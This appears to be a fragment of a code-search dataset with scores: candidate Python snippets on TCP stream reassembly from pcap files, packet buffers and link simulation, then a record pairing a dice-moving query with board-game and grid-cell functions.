open(self.newpcap, 'wb')\n # writer = dpkt.pcap.Writer(outfile)\n f = open(self.pcapfile, 'rb')\n packets = dpkt.pcap.Reader(f)\n\n for timestamp, buf in packets:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP): # 确保以太网数据包含一个IP数据包, Non IP Packet type not supported\n continue # 过滤空IP包\n ip = eth.data # 获取以太网帧(IP数据包)\n if not isinstance(ip.data, dpkt.tcp.TCP): # 在传输层中检查TCP\n continue\n tcp = ip.data # 获取tcp数据\n # print('-->TCP Data: ', repr(tcp))\n\n \"\"\" 过滤三次握手后的首包\"\"\"\n seq = self.seq_pattern.findall(repr(tcp))\n ack = self.ack_pattern.findall(repr(tcp))\n if not (seq or ack): # seq、ack必须有一个, 一真即真\n continue\n if ack:\n ack = ack[0]\n if seq:\n seq = seq[0]\n\n if not ack and seq: # 一次握手请求\n self.hash_table[seq] = {}\n self.stream_table[seq] = [buf]\n if ack and seq: # 二次、三次、交流包\n if str(int(ack) - 1) in self.hash_table.keys(): # 有一次握手记录\n number = str(int(ack) - 1)\n if 'second' not in self.hash_table[number].keys(): # 新增二次握手\n self.hash_table[number]['second'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf) # 将二次握手添加到buf\n self.resp_relation[seq] = ack # 新增关系表\n\n # 存在二次握手记录, 看hash表有无第三次握手记录, 有就保存stream流\n # 基本就是traffic响应包了\n elif 'three' in self.hash_table[number].keys():\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n\n # ack-1没有对应的hash表, 可能是三次握手或traffic请求包\n elif str(int(seq) - 1) in self.hash_table.keys():\n number = str(int(seq) - 1)\n if 'second' not in self.hash_table[number]:\n pass\n elif 'three' not in self.hash_table[number]: # 三次包\n self.hash_table[number]['three'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf)\n # 否则就是traffic包了\n else:\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n # traffic响应包\n elif str(int(seq) - 1) in self.resp_relation.keys():\n number = str(int(seq) - 1)\n second_ack = self.resp_relation[number]\n number = str(int(second_ack) - 1)\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n else:\n continue # seq不存在\n\n # outfile.close()\n f.close()", "def get_next_output_packet(self):\n if self.num_packets != 0:\n return self.packet_buffer.pop(0)", "def _convert_packets_into_batch(self, packets):\n assert 
isinstance(packets, (tuple, list))\n assert len(packets) > 0\n assert all(isinstance(packet, tuple) for packet in packets)\n assert all(len(packet) == 2 for packet in packets)\n assert all(isinstance(packet[0], Candidate) for packet in packets)\n assert all(isinstance(packet[1], str) for packet in packets)\n\n for candidate, packet in packets:\n # find associated community\n try:\n community = self.get_community(packet[2:22])\n except KeyError:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (received packet for unknown community) from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:unknown community\")\n self._statistics.drop_count += 1\n continue\n\n # find associated conversion\n try:\n conversion = community.get_conversion(packet[:22])\n except KeyError:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (received packet for unknown conversion) from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:unknown conversion\")\n self._statistics.drop_count += 1\n continue\n\n try:\n # convert binary data into the meta message\n yield conversion.decode_meta_message(packet), candidate, packet, conversion\n\n except DropPacket, exception:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (\", exception,\") from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:decode_meta_message:%s\" % exception)\n self._statistics.drop_count += 1", "def purce_all_dropped_messages(self) -> None:\n for mrec in _utils.getsome(self.droppedmsgs.pop):\n self.msgmap.remove_instance(mrec.id, mrec) # O(log(n))", "def send_packet(self):\n amountfreed = 0\n bitstransmitted = 0\n # If we are at or have passed the time at which we should send the next\n # packet, we should try to send the next packet.\n if (self.next_packet_send_time <= globals.systime):\n # If there is nothing currently in the buffer, we have nothing to\n # send at this time.\n if (len(self.buffer) == 0):\n self.next_packet_send_time = \\\n self.next_packet_send_time + globals.dt\n\n # Otherwise, It's time to send the packet at the front of the buffer\n else:\n packet_to_send = self.buffer.pop(0)\n amountfreed = packet_to_send.get_size()\n # Updates buffersize to reflect that we removed the packet\n # at the front of the buffer from the buffer.\n self.buffersize = self.buffersize - amountfreed\n\n # Time represents the amount of time in the previous dt that we\n # were transmitting. (i.e. 
between the previous systime and the\n # current)\n time = self.next_packet_send_time - (globals.systime - globals.dt)\n # bitstransmitted represents the number of bits that were\n # transmitted in the previous dt\n bitstransmitted = time * self.rate\n\n # Now we need to add the packet that we removed from the\n # buffer to the lists that keep track of the propegation of the\n # packets.\n self.packets_in_transmission.append(packet_to_send)\n self.packet_arrival_times.append(self.next_packet_send_time + self.delay)\n\n # If there are still packets in the buffer, update the time\n # to send the next packet to be when it would finish transmitting\n if (len(self.buffer) > 0):\n next_packet_size = self.buffer[0].get_size()\n self.next_packet_send_time = self.next_packet_send_time + \\\n next_packet_size * (1/self.rate)\n # If we finished transmitting a packet and immediately\n # started sending another, we transmitted the entire time\n # step.\n bitstransmitted = globals.dt * self.rate\n\n # the buffer is empty so we will just set the time to try to\n # send the next packet to be the next time step.\n else:\n self.next_packet_send_time = self.next_packet_send_time + \\\n globals.dt\n\n # in one of two cases: either buffer is empty or we used link to capacity\n # in last dt.\n else:\n # if the buffer is nonempty, we must have been transmitting for\n # the entire duration of the last timestep.\n if (len(self.buffer) != 0):\n bitstransmitted = globals.dt * self.rate\n else:\n pass\n\n # Now, we compute and update the effective rate of the link.\n rate = 0\n self.lrsteps.append(bitstransmitted)\n if(globals.systime <= self.lrwindow):\n if (globals.systime != 0):\n rate = sum(self.lrsteps)/(globals.systime + globals.dt)\n # when the time is 0, we will just set the rate to be 0.\n else:\n pass\n else:\n self.lrsteps.pop(0)\n rate = sum(self.lrsteps)/self.lrwindow\n self.effectiverate = rate\n\n # If we are tracking this HalfLink, we will also record its current\n # rate.\n if (self.track):\n key = self.id + \":\" + self.source + \"->\" + self.destination + \":\" \\\n + globals.LINKRATE\n dict = globals.statistics[key][globals.systime] = rate\n\n # Now we will check if any packets should be arriving at their\n # destination.\n if (len(self.packet_arrival_times) > 0):\n # If the time has passed the arrival time at the front of the list\n # of packet_arrival_times, we should remove the first item of the\n # list of packet_arrival_times, as well as the corresponding first\n # element of the list of packets_in_transmission and we should send\n # that packet to its destination.\n if (self.packet_arrival_times[0] <= globals.systime):\n packet_to_send = self.packets_in_transmission.pop(0)\n self.packet_arrival_times.pop(0)\n dest_type = ''\n if self.destination[0] == 'H':\n dest_type = 'hosts'\n else:\n dest_type = 'routers'\n receiver = globals.idmapping[dest_type][self.destination]\n receiver.receive_packet(packet_to_send, self.id)\n return amountfreed", "def remove_discarded(self):\n while self.shrink_target.has_discards:\n discarded = []\n\n for ex in self.shrink_target.examples:\n if ex.discarded and (not discarded or ex.start >= discarded[-1][-1]):\n discarded.append((ex.start, ex.end))\n\n assert discarded\n\n attempt = bytearray(self.shrink_target.buffer)\n for u, v in reversed(discarded):\n del attempt[u:v]\n\n if not self.incorporate_new_buffer(attempt):\n break", "def delcomptcptxpackets(self) :\n\t\ttry :\n\t\t\treturn self._delcomptcptxpackets\n\t\texcept Exception as e:\n\t\t\traise e", "def 
_prune(self):\n while len(self.data) > self.limit:\n self.data.popleft()", "def emptyBuffer(self):\n msg = True\n while msg:\n msg = self.receive()", "def _popN(self, n):\n for _ in range(n):\n self._buffer.popleft()", "def _leftovers(self, fl):\n try:\n data = self.sock.recv(1024, fl)\n except socket.error as _:\n return False\n if len(data) != 0:\n tail = data\n while True:\n (head, tail) = Ctrl().split_combined(tail)\n print(\"Got message:\", Ctrl().rem_header(head))\n if len(tail) == 0:\n break\n return True\n return False", "def parseBuffer(self):\n idx = self.buf.find(DELIMITER)\n while idx > -1:\n packet = self.buf[0:idx]\n if len(packet) > 4:\n if packet[0:3] == 'DATA':\n self.factory.setData(packet[4:idx])\n else:\n print \"%s is a malformed packet, header %s not recognized\" % (packet, packet[0:3])\n else:\n print \"%s attempting to send a packet of invalid length %s\" % (packet, len(packet))\n self.buf = self.buf[(idx + len(DELIMITER)):]\n idx = self.buf.find(DELIMITER)", "def delcomptcprxpackets(self) :\n\t\ttry :\n\t\t\treturn self._delcomptcprxpackets\n\t\texcept Exception as e:\n\t\t\traise e", "def _discard_until_message_start(buffer):\n discarded_bytes = bytearray()\n\n for index, c in enumerate(buffer):\n if c not in {MESSAGE_START_BYTE, MESSAGE_FAILURE_BYTE}:\n discarded_bytes.append(c)\n else:\n break\n\n if discarded_bytes:\n buffer[:len(discarded_bytes)] = []\n discarded_bytes = discarded_bytes.lstrip(b'\\x00')\n\n if discarded_bytes:\n logger.warning(\n \"Discarding %s unexpected byte(s): %s\",\n len(discarded_bytes),\n discarded_bytes.hex(),\n )", "def decomptcptxpackets(self) :\n\t\ttry :\n\t\t\treturn self._decomptcptxpackets\n\t\texcept Exception as e:\n\t\t\traise e", "def iter_packets(iterable):\n prev = None\n\n for i in sorted(iterable, key=attrgetter('seq')):\n if prev is None or prev.seq != i.seq:\n prev = i\n yield i", "def deQueue(self):\n if self.isEmpty():\n return False\n self.__start = (self.__start+1) % len(self.__buffer)\n self.__size -= 1\n return True", "def send_from_buffer(decoded_seq, lowest_seq):\n if decoded_seq == lowest_seq:\n log(f'removing {lowest_seq} from buffer')\n # Remove the ack-ed sequence from the buffer and get the stored value\n acked_packet = BUFFER.pop(lowest_seq)\n rtt_start = acked_packet.rtt_start\n calculate_rtt(rtt_start, rtt_stop)\n # Try to send next packet\n sent_packet = send_next_packet()\n if sent_packet:\n BUFFER[SEQUENCE] = sent_packet\n return True\n else:\n # No more packets to send. Wait for other acks\n log('packet not sent')\n return False", "def _read_packets(self, cur_time):\n if not isinstance(self._packets, list):\n self._set_last_time(cur_time + self._read_time)\n else:\n self._set_last_time(cur_time + len(self._packets) * self._read_time)\n self.delete_packets(len(self._packets))", "def pop_from_deque(self):" ]
[ "0.67283076", "0.66058624", "0.63236773", "0.6317739", "0.6310936", "0.62291014", "0.61791795", "0.60786915", "0.60678726", "0.59578645", "0.5947683", "0.5928341", "0.5889969", "0.5796768", "0.5776283", "0.5721672", "0.571722", "0.57118416", "0.5706474", "0.5685877", "0.5665577", "0.56438065", "0.56415844", "0.5609237", "0.5579427", "0.55651146", "0.5552176", "0.55493534", "0.5535785", "0.5502268" ]
0.7841867
0
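
The `remove_buffered_packets` document above drains a reassembly buffer in sequence order: starting at `next_seq`, it pops each contiguous segment, advances the cursor by the payload length, and stops at the first gap. A minimal sketch; the shape of the owning object (a `next_seq` cursor plus a seq-keyed `buffer` dict) is inferred from the row, not shown in the dataset:

from collections import namedtuple
from types import SimpleNamespace

Packet = namedtuple('Packet', ['seq', 'data'])

def remove_buffered_packets(self):
    seq = self.next_seq

    while True:
        p = self.buffer.pop(seq, None)

        if p is None:
            break  # gap: the next contiguous segment has not arrived yet
        else:
            seq += len(p.data)  # advance the cursor past this payload
            yield p

stream = SimpleNamespace(
    next_seq=100,
    buffer={100: Packet(100, b'abc'),
            103: Packet(103, b'de'),
            200: Packet(200, b'x')},
)

drained = list(remove_buffered_packets(stream))
assert [p.seq for p in drained] == [100, 103]     # stops at the gap before 200
assert stream.buffer == {200: Packet(200, b'x')}  # unreachable segment stays put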
Move a die through a list of positions.
def move(self, *positions, show_length=True) -> str:
    move_parts = []
    move_count = len(positions)
    pips = prev_x = prev_y = 0
    for i, (x, y) in enumerate(positions):
        if i == 0:
            pips = self.dice.pop((x, y))
        else:
            dx = x - prev_x
            dy = y - prev_y
            if 0 < dx:
                move_part = f'R{dx}'
            elif dx < 0:
                move_part = f'L{-dx}'
            elif 0 < dy:
                move_part = f'U{dy}'
            else:
                move_part = f'D{-dy}'
            if not show_length:
                move_part = move_part[0]
            if i == 1:
                move_part = f'{pips}{move_part}'
            if i == move_count - 1:
                self.dice[x, y] = pips
            move_parts.append(move_part)
        prev_x = x
        prev_y = y
    return ''.join(move_parts)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def throw(self, move):\n for dice_index in move:\n self.dice[dice_index - 1] = random.randint(1,6)", "def move_tie_fighters(self):\n for i in range(len(self.tie_fighters)):\n self.tie_fighters[i].move_tie_fighter()", "def migration(self):\n\n coordinates = self.get_random_coordinates()\n for coordinate in coordinates:\n if isinstance(self.cells[coordinate], (Jungle, Savannah, Desert)):\n self.cell_move_herbivores(coordinate)\n self.cell_move_carnivores(coordinate)\n\n for coordinate in coordinates:\n if isinstance(self.cells[coordinate], (Jungle, Savannah, Desert)):\n self.cells[coordinate].move_new_animals()", "def move(self, direction, cycles):\n\t\tpass", "def move(self, direction: str) -> int:\n (i, j), _ = self.position.popitem(last=True) # current position\n self.position[(i, j)] = 0 # add back \n if direction == \"U\": i -= 1\n elif direction == \"L\": j -= 1\n elif direction == \"R\": j += 1\n else: i += 1\n if self.food and self.food[0] == [i, j]: self.food.popleft()\n else: self.position.popitem(last=False)\n if not (0 <= i < self.height and 0 <= j < self.width) or (i, j) in self.position: return -1 # game over \n self.position[(i, j)] = 0\n return len(self.position)-1", "def roll_the_dice(self, dice):\n if type(dice) == list:\n for die in dice:\n die.roll()", "def move(self):\n for agent in self.agents:\n if not agent.fidelity:\n options = agent.get_move_options(agent.hex, self.kernel_size, None, extend=True)\n target = random36.choices(population=options,weights=[x.quality**2 for x in options])\n agent.move(target[0])", "def one_player_leg(length, pos):\n throw = dice()\n moves = []\n while throw == 6:\n if pos + throw < length:\n pos += throw\n moves.append(throw)\n elif pos + throw == length:\n pos += throw\n moves.append(throw)\n return pos, moves\n else:\n moves.append(throw)\n throw = dice()\n else:\n if pos + throw < length:\n pos += throw\n moves.append(throw)\n elif pos + throw == length:\n pos += throw\n moves.append(throw)\n return pos, moves\n else:\n moves.append(throw)\n return pos, moves", "def roll_dices(self):\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n\n self.client.send_player_end_dices()\n self.game.player_rolled_dices([dice1, dice2])\n asyncio.ensure_future(self.move(dice1 + dice2))", "def test_move():\n human = Human()\n coordinates = [2, 1]\n dimensions = [3, 4]\n\n new_coordinates = human.move(coordinates, dimensions)\n\n possible_new_coordinates = [[2, 0], [3, 0], [3, 1], [3, 2], [2, 2], [1, 2], [1, 1], [1, 0]]\n\n assert new_coordinates in possible_new_coordinates", "def move(self, direction):\n head = self.snake[0]\n delta = self.dirs[direction]\n nextMove = [head[0] + delta[0], head[1] + delta[1]]\n if not self.isValidMove(nextMove):\n return -1\n\n if self.food and nextMove == self.food[0]:\n self.food.popleft()\n else:\n self.snake.pop()\n\n self.snake.appendleft(nextMove)\n\n return len(self.snake) - 1", "def move(self, direction=0):\n moves = [\n [3, 1],\n [2, 2],\n [1, 3],\n [0, 0]\n ]\n\n self._rotate(moves[direction][0])\n\n for row in range(4):\n r = [i for i in self.map[row] if i != 0]\n\n r_result = []\n while(len(r)):\n num = r.pop(0)\n if len(r) and num == r[0]:\n num += r.pop(0)\n # TODO: Do a 2048 check here to see if the player won?\n # this might not be the best place because we could use\n # this method to run tests to see if the player has any valid moves\n r_result.append(num)\n \n self.map[row] = r_result + [0]*(4-len(r_result))\n\n self._add_random_piece()\n\n self._rotate(moves[direction][1])\n 
self.print_map()", "def eat(bots, food_list):\n \n # iterates through bot positions\n for bot in bots:\n # iterates through food positions\n for food_loc in food_list:\n # compare bot and food positions\n first_pos = bot.position[0] == food_loc[0]\n second_pos = bot.position[1] == food_loc[1]\n \n # if food and bot in same spot, food is removed\n if first_pos and second_pos:\n food_list.remove(food_loc)", "def move(self, coordinates, direction):\n pass", "def move(t, length):\n pu(t)\n\t\n fd(t, length)\n pd(t)", "def move(exits, direction):\r\n return rooms[exits[direction]]", "def actions_turn(positions, player1, player2, creatures):\n\n attacking = []\n moving = []\n\n # Split the orders within attacks and movements\n for character in positions:\n if character in creatures:\n if positions[character]['order'] == 'attack':\n attacking += character\n else:\n moving += character\n elif character in player1:\n if positions[character]['order'] == 'attack':\n attacking += character\n else:\n moving += character\n\n else:\n if positions[character]['order'] == 'attack':\n attacking += character\n else:\n moving += character\n\n # Execute the attacks\n for character in attacking:\n # First attacking : the creatures\n if character in creatures:\n hero_name = character\n name_attack = positions[character]['name_attack']\n attack_coord = positions[character]['where']\n attack(positions, hero_name, name_attack, (0, 0), attack_coord, player1, player2, creatures)\n # Then the heroes of the first player\n elif character in player1:\n hero_name = character\n name_attack = positions[character]['name_attack']\n attack_coord = positions[character]['where']\n attack(positions, hero_name, name_attack, (0, 0), attack_coord, player1, player2, creatures)\n # Finally the ones of the second player\n else:\n hero_name = character\n name_attack = positions[character]['name_attack']\n attack_coord = positions[character]['where']\n attack(positions, hero_name, name_attack, (0, 0), attack_coord, player1, player2, creatures)\n\n for character in moving:\n print(character, moving)\n # First moving : the creatures\n if character in creatures:\n hero_name = character\n movement_coord = positions[character]['where']\n move(hero_name, positions, movement_coord)\n\n # Then the heroes of the first player\n elif character in player1:\n hero_name = character\n movement_coord = positions[character]['where']\n move(hero_name, positions, movement_coord)\n\n # Finally the ones of the second player\n else:\n hero_name = character\n movement_coord = positions[character]['where']\n move(hero_name, positions, movement_coord)\n\n return player1, player2, positions, creatures", "def move(self):\n if self.adjustment > 0:\n # The player moves up a ladder\n old_position = self.position\n # In the next move, player on top of ladder\n\n self.position = old_position - self.dropped_steps\n # player drops steps\n super().move()\n # player move\n die = self.position - old_position + self.dropped_steps - \\\n self.adjustment\n \"\"\" \n the current position of the player is: old position - \n dropped_steps + die + adjustment. 
Rearranging to find the die.\n \n \"\"\"\n if die < self.dropped_steps:\n self.position = old_position\n # if die is less than dropped_steps, the player will stand still.\n else:\n super().move()\n # if not climbling a ladder, then the player make a regular move", "def temp_swap_dice(self, move, new_faces):\n assert len(move) == len(new_faces)\n output = list(self.dice)\n for face in move:\n output.remove(face)\n for face in new_faces:\n output.append(face)\n return tuple(sorted(output))", "def find_moveable_pieces(self, die, p1): \n moveable = []\n if (p1):\n #must we re-enter?\n if (self.p1vec[0] > 0):\n if (self.free_spot(0, die, p1)):\n b = Board(self.p1vec[:],self.p2vec[:])\n b.move(0, die, p1)\n moveable.append(b)\n #no? ok then generate the moves\n else:\n for i in range(1, 25):\n if (self.p1vec[i] > 0):\n if (self.free_spot(i, die, p1)):\n b = Board(self.p1vec[:],self.p2vec[:])\n b.move(i, die, p1)\n moveable.append(b)\n else:\n #must we re-enter?\n if (self.p2vec[0] > 0):\n if (self.free_spot(0, die, p1)):\n b = Board(self.p1vec[:],self.p2vec[:])\n b.move(0, die, p1)\n moveable.append(b)\n #no? ok then generate the moves\n else:\n for i in range(1, 25):\n if (self.p2vec[i] > 0):\n if (self.free_spot(i, die, p1)):\n b = Board(self.p1vec[:],self.p2vec[:])\n b.move(i, die, p1)\n moveable.append(b)\n return moveable", "def on_die(self, head_position, board, score, body_parts):", "def move(self,move):\n for x in range(len(self.coord)):\n self.coord[x] = np.array([y+np.array(move) for y in self.coord[x]])\n return self", "def DoMove(position, move):\n return position - move", "def move(self, direction):\n # replace with your code\n\n indices = self.direction_indices[direction]\n for coordinate in indices:\n merged_coordinate_list = self.get_list(direction, coordinate)\n self.change_board(merged_coordinate_list, coordinate, direction)\n print(self.__str__())\n if self.board_is_not_full():\n self.new_tile()", "def move(self):\r\n segments = len(self.all_turtles) - 1\r\n for i in range(len(self.all_turtles)):\r\n if segments == 0:\r\n self.all_turtles[segments].forward(MOVE_DISTANCE)\r\n else:\r\n new_x = self.all_turtles[segments - 1].xcor()\r\n new_y = self.all_turtles[segments - 1].ycor()\r\n self.all_turtles[segments].goto(new_x, new_y)\r\n segments -= 1", "def postion_fleet(self, ships_positions, board):\n for cell in ships_positions:\n row = ord(cell[:1]) - ord('A')\n col = int(cell[1:]) - 1\n for i in range(row, row + self.total_rows_req):\n for j in range(col, col + self.total_column_req):\n self.position_ship(\n board.grid[i][j],\n constants.FLEET_P_CLASS,\n constants.P_CLASS_HIT_POWER\n )", "def move(self):\n assert self.is_alive, \"Sprite is dead, and should not be able to move\"\n if self.health > 3:\n self.y += random.randint(-1, 1) # change by -1, 0, 1\n self.x += random.randint(-1, 1) # change by -1, 0, 1\n print(self.name, \"moves to position\", str(self.x), \",\", str(self.y))", "def move_all_animals(self):\n\n y_lim, x_lim = np.shape(self.map)\n for y in range(y_lim):\n for x in range(x_lim):\n loc = y, x\n self.map[loc].migration(self.get_neighbour((y, x)))", "def postion_fleet(self, ships_positions, board):\n for cell in ships_positions:\n row = ord(cell[:1]) - ord('A')\n col = int(cell[1:]) - 1\n for i in range(row, row + self.total_rows_req):\n for j in range(col, col + self.total_column_req):\n self.position_ship(\n board.grid[i][j],\n constants.FLEET_Q_CLASS,\n constants.Q_CLASS_HIT_POWER\n )", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 
1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move" ]
[ "0.66328007", "0.596524", "0.5870962", "0.58515584", "0.5819032", "0.57985187", "0.5759108", "0.57562107", "0.574448", "0.57078034", "0.56926847", "0.56588614", "0.5642412", "0.5605683", "0.5596673", "0.5586302", "0.55856097", "0.5582289", "0.5575625", "0.55608356", "0.55554855", "0.5535301", "0.55272806", "0.55162615", "0.55116314", "0.55028677", "0.5497211", "0.5493248", "0.5492864", "0.549278" ]
0.63560057
1
Record the joint character between a pair of cells.
def add_joint(joint: str, x1: int, y1: int, x2: int, y2: int) -> str:
    return joint
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def junction_char(self):\n ...", "def _put_chr_at(self, char, row, col, color, adjustment_x=.19, adjustment_y=.19):\n self._goto_piece_xy(row, col, adjustment_x, adjustment_y)\n self.pen.color(color)\n self.pen.write(char, font=(\"Courier\", round(self.square_side_size * .7),\n \"normal\"))", "def encryptPair(self):\n # Locate the characters in the matrix\n self.deselectCanvasses()\n (row1, col1) = self.matrix.find(self.plainText[self.cursor])\n (row2, col2) = self.matrix.find(self.plainText[self.cursor + 1])\n self.selectCanvas(row1, col1, \"gray\")\n self.selectCanvas(row2, col2, \"gray\")\n # Swap them if they are in the same row or column\n if row1 == row2 or col1 == col2:\n return self.plainText[self.cursor + 1] + self.plainText[self.cursor]\n # Otherwise, use the characters at the opposite\n # corners of the rectangle in the matrix\n else:\n self.selectCanvas(row2, col1, \"pink\")\n self.selectCanvas(row1, col2, \"pink\")\n ch1 = self.matrix[row2][col1]\n ch2 = self.matrix[row1][col2]\n return ch1 + ch2", "def _get_letters_adjacent_cells(self, grid, x0, y0):\n letters = ''\n for cell in grid.get_adjacent_cells(x0, y0):\n letters = letters + cell['letter']\n return ''.join(sorted(letters))", "def joint_pairs(self):\n return ((1, 4), (2, 5), (3, 6), (14, 11), (15, 12), (16, 13))", "def en_passant(self, from_row, from_col, to_row, to_col):\n t = self.data[from_row][from_col]\n self.data[from_row][from_col] = '.'\n self.data[to_row][to_col] = t \n self.data[from_row][to_col] = '.'", "def display_board(board: list, character: list):\n for index in range(len(board)):\n for index_two in range(len(board[index])):\n current_position = [index, index_two]\n if current_position == character:\n if index_two == len(board[index]) - 1:\n print('c')\n else:\n print('c', end=\" \")\n else:\n if index_two == len(board[index]) - 1:\n print('x')\n else:\n print('x', end=\" \")", "def createperson(self, board, x_ind, y_ind, char):\n self = self\n for i in range(4):\n for j in range(2):\n board[x_ind + j][y_ind + i] = char\n return board", "def cell_value(self, x, y):\n if x == 8 and y == 0:\n return \"--\"\n (r, g) = self[(x, y)]\n return \"%s%s\" % (r, g)", "def label_joints():\n side_dict = {'C': 0,\n 'L': 1,\n 'R': 2}\n for jnt in mc.ls(type='joint'):\n mc.setAttr('{}.side'.format(jnt), side_dict[jnt.split('_')[0]])\n mc.setAttr('{}.type'.format(jnt), 18)\n mc.setAttr('{}.otherType'.format(jnt), jnt.split('_')[1], type=\"string\")", "def display_position(game_board: list, character: list):\n print(\"You are currently here:\")\n for position in game_board:\n if position[0] == character[0] and position[1] == character[1]:\n print('C', end=\" \")\n else:\n print(\"*\", end=\" \")\n if position[1] == game_board[-1][1]:\n print(\"\")", "def writechar(self, char=\" \"):\n\n font=self.selectfont(char)\n t = self.canvas.beginText(self.x, self.y)\n t.setFont(font, self.fontsize)\n t.setFillGray(self.gray)\n t.textOut(char)\n self.canvas.drawText(t)\n return t", "def dummy_junction24():\n return 'junction:chr1:251-399:+'", "def insertJoint(*args, **kwargs)->AnyStr:\n pass", "def __str__(self) -> str:\n output = self.columns * \" __\" + \"\\n\"\n for i in range(self.rows):\n for j in range(self.columns):\n filling = \"__\"\n if len(self.cells[i][j].agents) == 1:\n filling = \"_§\"\n elif len(self.cells[i][j].agents) == 2:\n filling = \"§§\"\n elif len(self.cells[i][j].agents) > 2:\n filling = \"++\"\n output += \"|\" + filling\n if j == self.columns - 1:\n output += \"|\"\n output += \"\\n\"\n return output", 
"def dummy_junction23():\n return 'junction:chr1:251-299:+'", "def jointext(firststring, secondstring):\n\n # Return the joined strings\n return str(firststring) + str(secondstring)", "def coord_char(coord, matrix):\n row_index, column_index = coord\n\n return matrix[row_index][column_index]", "def dummy_junction13():\n return 'junction:chr1:176-299:+'", "def simple_cell_string(self, values):\n if len(values) == 0:\n return '!'\n elif len(values) == 1:\n return self.number_strings[values[0]]\n else:\n return '.'", "def encode(self, char):\n\n if char == self.pair[0]:\n return self.pair[1]\n elif char == self.pair[1]:\n return self.pair[0]\n else:\n return char", "def joint_callback(data):\n joints[0] = data.position[9]\n joints[1] = data.position[10]\n joints[2] = data.position[11]\n joints[3] = data.position[12]\n joints[4] = data.position[13]\n global position_geted\n position_geted = True", "def joint_pairs(self):\n return [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16], #17 body keypoints\n [20-3, 23-3], [21-3, 24-3], [22-3, 25-3], [26-3, 42-3], [27-3, 41-3], [28-3, 40-3], [29-3, 39-3], [30-3, 38-3], \n [31-3, 37-3], [32-3, 36-3], [33-3, 35-3], [43-3, 52-3], [44-3, 51-3], [45-3, 50-3], [46-3, 49-3], [47-3, 48-3], \n [62-3, 71-3], [63-3, 70-3], [64-3, 69-3], [65-3, 68-3], [66-3, 73-3], [67-3, 72-3], [57-3, 61-3], [58-3, 60-3],\n [74-3, 80-3], [75-3, 79-3], [76-3, 78-3], [87-3, 89-3], [93-3, 91-3], [86-3, 90-3], [85-3, 81-3], [84-3, 82-3],\n [94-3, 115-3], [95-3, 116-3], [96-3, 117-3], [97-3, 118-3], [98-3, 119-3], [99-3, 120-3], [100-3, 121-3],\n [101-3, 122-3], [102-3, 123-3], [103-3, 124-3], [104-3, 125-3], [105-3, 126-3], [106-3, 127-3], [107-3, 128-3],\n [108-3, 129-3], [109-3, 130-3], [110-3, 131-3], [111-3, 132-3], [112-3, 133-3], [113-3, 134-3], [114-3, 135-3]]", "def test_two_cell_repel():\n space = c6.Space()\n c6.Cell(space, [0, 0], 1)\n c6.Cell(space, [0, 1.9], 1)\n for i in range(2):\n space.step()", "def dummy_junction14():\n return \"junction:chr1:176-324:+\"", "def add_char(self, coord, char, modify=False):\n if modify:\n range_y, range_x = self._map_dims\n new_coord = [coord[0]+range_y[0]-1, coord[1]+range_x[0]-1]\n self._screen.addch(new_coord[0], new_coord[1], char)\n self._screen.refresh()\n return new_coord\n else:\n self._screen.addch(coord[0], coord[1], char)\n self._screen.refresh()\n return coord", "def interact(self,cell1,cell2):\n difference = math.fabs(cell1-cell2)\n if difference<=self.t: #if both cells are close enough: \n if cell1>cell2:\n # print \"Case 1\"\n return (cell1-difference/2.0,cell2+difference/2.0)\n else:\n # print \"Case 2\"\n return (cell1+difference/2.0,cell2-difference/2.0)\n else: #cells too far apart, they radicalize\n if cell1>cell2:\n # print \"Case 3\"\n return (cell1+(1-cell1)/2.0,cell2/2.0) #the higher one moves toward 1, the lower one moves toward 0\n else:\n # print \"Case 4\"\n return (cell1/2.0,cell2+(1-cell2)/2.0)", "def __createkey__(self):\n return str(self.currentCol) + \",\" + str(self.currentRow)", "def getCellStr(self, x, y): # TODO: refactor regarding issue #11\n c = self.board.getCell(x, y)\n\n if c == 0:\n return '.' 
if self.__azmode else ' .'\n\n elif self.__azmode:\n az = {}\n for i in range(1, int(math.log(self.board.goal(), 2))):\n az[2 ** i] = chr(i + 96)\n\n if c not in az:\n return '?'\n s = az[c]\n elif c == 1024:\n s = ' 1k'\n elif c == 2048:\n s = ' 2k'\n else:\n s = '%3d' % c\n\n return self.__colors.get(c, Fore.RESET) + s + Style.RESET_ALL", "def teleport_pair(cell, game_coords):\n # get cell display\n item = search_coords(game_coords, cell)\n\n if item in ['1', '2', '3', '4', '5', '6', '7', '8', '9']:\n for coords in game_coords[item]:\n # partner pad found\n if coords != cell:\n return coords\n\n # not a teleport pad\n return -1" ]
